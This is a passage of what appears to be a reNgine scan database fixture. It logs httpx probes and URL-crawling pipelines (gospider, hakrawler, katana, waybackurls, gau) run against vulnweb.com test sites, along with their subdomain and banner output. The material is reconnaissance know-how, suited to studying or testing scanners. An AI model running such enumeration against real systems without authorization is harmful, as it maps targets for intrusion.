13T02:07:42.278021296Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u001etestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278025325Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u002erest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278029403Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u002etestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.27803512Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u003erest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278039262Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u003etestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278043977Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u004erest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278048451Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u004etestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.27805256Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u005erest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278056821Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u005etestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278063213Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u006erest.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278067425Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"u006etestasp.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278071662Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"virus.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278083957Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"viruswall.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278088192Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"www.test.php.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278093903Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"www.virus.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278098764Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n{\"host\":\"yxraaderrick.vulnweb.com\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:07:42.278103183Z\",\"port\":80,\"protocol\":\"tcp\",\"tls\":false}\n", + "time": "2024-11-13T02:07:32.074Z" + } +}, +{ + "model": "startScan.command", + "pk": 38, + "fields": { + "scan_history": 1, + "activity": null, + "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 1 -json -u rest.vulnweb.com:8081 -silent", + "return_code": 0, + "output": "{\"timestamp\":\"2024-11-13T02:07:37.801087899Z\",\"port\":\"8081\",\"url\":\"http://rest.vulnweb.com:8081\",\"input\":\"rest.vulnweb.com:8081\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/json\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/\",\"time\":\"198.18815ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\",\"PHP:7.1.26\"],\"words\":4,\"lines\":1,\"status_code\":200,\"content_length\":40,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n", + "time": "2024-11-13T02:07:36.221Z" + } +}, +{ + "model": "startScan.command", + "pk": 39, + "fields": { + "scan_history": 1, + "activity": null, + "command": "rm /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/httpx_input.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:07:37.919Z" + } +}, +{ + "model": "startScan.command", + "pk": 40, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://rest.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gospider_rest.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.210Z" + } +}, +{ + "model": "startScan.command", + "pk": 41, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://rest.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_hakrawler_rest.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.356Z" + } +}, +{ + "model": "startScan.command", + "pk": 42, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://rest.vulnweb.com\" | waybackurls | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_waybackurls_rest.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.380Z" + } +}, +{ + "model": "startScan.command", + "pk": 43, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://rest.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_katana_rest.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.405Z" + } +}, +{ + "model": "startScan.command", + "pk": 44, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://rest.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://rest\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gau_rest.vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:14.430Z" + } +}, +{ + "model": "startScan.command", + "pk": 45, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testasp.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gospider_testasp.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.464Z" + } +}, +{ + "model": "startScan.command", + "pk": 46, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testasp.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_hakrawler_testasp.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.499Z" + } +}, +{ + "model": "startScan.command", + "pk": 47, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testasp.vulnweb.com\" | waybackurls | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_waybackurls_testasp.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.530Z" + } +}, +{ + "model": "startScan.command", + "pk": 48, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testasp.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_katana_testasp.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.559Z" + } +}, +{ + "model": "startScan.command", + "pk": 49, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testasp.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://testasp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gau_testasp.vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:14.585Z" + } +}, +{ + "model": "startScan.command", + "pk": 50, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testaspnet.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gospider_testaspnet.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.613Z" + } +}, +{ + "model": "startScan.command", + "pk": 51, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testaspnet.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_hakrawler_testaspnet.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.640Z" + } +}, +{ + "model": "startScan.command", + "pk": 52, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testaspnet.vulnweb.com\" | waybackurls | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_waybackurls_testaspnet.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.664Z" + } +}, +{ + "model": "startScan.command", + "pk": 53, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testaspnet.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_katana_testaspnet.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.690Z" + } +}, +{ + "model": "startScan.command", + "pk": 54, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testaspnet.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://testaspnet\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gau_testaspnet.vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:14.716Z" + } +}, +{ + "model": "startScan.command", + "pk": 55, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testhtml5.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gospider_testhtml5.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.771Z" + } +}, +{ + "model": "startScan.command", + "pk": 56, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testhtml5.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_hakrawler_testhtml5.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.796Z" + } +}, +{ + "model": "startScan.command", + "pk": 57, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testhtml5.vulnweb.com\" | waybackurls | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_waybackurls_testhtml5.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.827Z" + } +}, +{ + "model": "startScan.command", + "pk": 58, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testhtml5.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_katana_testhtml5.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.867Z" + } +}, +{ + "model": "startScan.command", + "pk": 59, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testhtml5.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://testhtml5\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gau_testhtml5.vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:14.903Z" + } +}, +{ + "model": "startScan.command", + "pk": 60, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testphp.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gospider_testphp.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.939Z" + } +}, +{ + "model": "startScan.command", + "pk": 61, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testphp.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_hakrawler_testphp.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:14.979Z" + } +}, +{ + "model": "startScan.command", + "pk": 62, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testphp.vulnweb.com\" | waybackurls | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_waybackurls_testphp.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:15.048Z" + } +}, +{ + "model": "startScan.command", + "pk": 63, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testphp.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_katana_testphp.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:15.113Z" + } +}, +{ + "model": "startScan.command", + "pk": 64, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://testphp.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://testphp\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gau_testphp.vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:15.174Z" + } +}, +{ + "model": "startScan.command", + "pk": 65, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gospider_vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:15.252Z" + } +}, +{ + "model": "startScan.command", + "pk": 66, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_hakrawler_vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:15.291Z" + } +}, +{ + "model": "startScan.command", + "pk": 67, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://vulnweb.com\" | waybackurls | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_waybackurls_vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:15.370Z" + } +}, +{ + "model": "startScan.command", + "pk": 68, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_katana_vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:15.407Z" + } +}, +{ + "model": "startScan.command", + "pk": 69, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gau_vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:15.445Z" + } +}, +{ + "model": "startScan.command", + "pk": 70, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://www.vulnweb.com\" | gospider --js -d 2 --sitemap --robots -w -r -a -t 30 --no-redirect | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gospider_www.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:15.484Z" + } +}, +{ + "model": "startScan.command", + "pk": 71, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://www.vulnweb.com\" | hakrawler -subs -u -t 30 -dr | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_hakrawler_www.vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:15.516Z" + } +}, +{ + "model": "startScan.command", + "pk": 72, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://www.vulnweb.com\" | waybackurls | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_waybackurls_www.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:15.549Z" + } +}, +{ + "model": "startScan.command", + "pk": 73, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://www.vulnweb.com\" | katana -silent -jc -kf all -d 3 -fs rdn -c 30 -dr | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_katana_www.vulnweb.com.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:08:15.584Z" + } +}, +{ + "model": "startScan.command", + "pk": 74, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "echo \"http://www.vulnweb.com\" | gau --threads 30 | grep -Eo 'https?://www\\.vulnweb\\.com(:[0-9]+)?(/.*)?$' > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_gau_www.vulnweb.com.txt", + "return_code": 1, + "output": "", + "time": "2024-11-13T02:08:15.619Z" + } +}, +{ + "model": "startScan.command", + "pk": 75, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_* > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:14:49.374Z" + } +}, +{ + "model": "startScan.command", + "pk": 76, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/input_endpoints_fetch_url.txt >> /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:14:49.420Z" + } +}, +{ + "model": "startScan.command", + "pk": 77, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "sort -u /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt -o /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:14:49.465Z" + } +}, +{ + "model": "startScan.command", + "pk": 78, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "cat /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt | grep -Eiv \"\\.(png|jpg|jpeg|gif|mp4|mpeg|mp3).*\" > /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_filtered.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:14:49.525Z" + } +}, +{ + "model": "startScan.command", + "pk": 79, + "fields": { + "scan_history": 1, + "activity": 5, + "command": "mv /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/urls_filtered.txt /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/#1_fetch_url.txt", + "return_code": 0, + "output": "", + "time": "2024-11-13T02:14:49.572Z" + } +}, +{ + "model": "startScan.command", + "pk": 80, + "fields": { + "scan_history": 1, + "activity": null, + "command": "httpx -cl -ct -rt -location -td -websocket -cname -asn -cdn -probe -random-agent -t 30 -json -l /home/rengine/scan_results/vulnweb.com/scans/956910ad-a163-11ef-b299-e5f7db5e340b/httpx_input.txt -silent", + "return_code": 0, + "output": "{\"timestamp\":\"2024-11-13T02:15:01.951322859Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com/docs/locales/locale.js?v=1600695504196\",\"input\":\"http://rest.vulnweb.com/docs/locales/locale.js?v=1600695504196\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/docs/locales/locale.js?v=1600695504196\",\"time\":\"184.666826ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\"],\"words\":310,\"lines\":52,\"status_code\":200,\"content_length\":1300,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:01.951219266Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com/docs/locales/pl.js?v=1596328981612\",\"input\":\"http://rest.vulnweb.com/docs/locales/pl.js?v=1596328981612\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/docs/locales/pl.js?v=1596328981612\",\"time\":\"184.753494ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\"],\"words\":575,\"lines\":26,\"status_code\":200,\"content_length\":1251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:01.953608603Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com/docs/locales/nl.js?v=1596328981612\",\"input\":\"http://rest.vulnweb.com/docs/locales/nl.js?v=1596328981612\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/docs/locales/nl.js?v=1596328981612\",\"time\":\"186.077175ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\"],\"words\":579,\"lines\":26,\"status_code\":200,\"content_length\":1266,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:01.954174588Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com/docs/locales/de.js?v=1596328981612\",\"input\":\"http://rest.vulnweb.com/docs/locales/de.js?v=1596328981612\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/docs/locales/de.js?v=1596328981612\",\"time\":\"186.640415ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\"],\"words\":575,\"lines\":26,\"status_code\":200,\"content_length\":1259,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:01.954641589Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com/docs/locales/nl.js?v=1600695504196\",\"input\":\"http://rest.vulnweb.com/docs/locales/nl.js?v=1600695504196\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/docs/locales/nl.js?v=1600695504196\",\"time\":\"187.396213ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\"],\"words\":579,\"lines\":26,\"status_code\":200,\"content_length\":1266,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:01.960966645Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com/docs/locales/es.js?v=1596328981612\",\"input\":\"http://rest.vulnweb.com/docs/locales/es.js?v=1596328981612\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/docs/locales/es.js?v=1596328981612\",\"time\":\"193.878114ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP Server:2.4.25\",\"Debian\"],\"words\":583,\"lines\":26,\"status_code\":200,\"content_length\":1269,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:15:01.961731316Z\",\"port\":\"80\",\"url\":\"http://rest.vulnweb.com/docs/locales/ca.js?v=1596328981612\",\"input\":\"http://rest.vulnweb.com/docs/locales/ca.js?v=1596328981612\",\"scheme\":\"http\",\"webserver\":\"Apache/2.4.25 (Debian)\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"18.215.71.186\",\"path\":\"/docs/locales/ca.js?v=1596328981612\",\"time\":\"194.492455ms\",\"a\":[\"18.215.71.186\"],\"tech\":[\"Apache HTTP 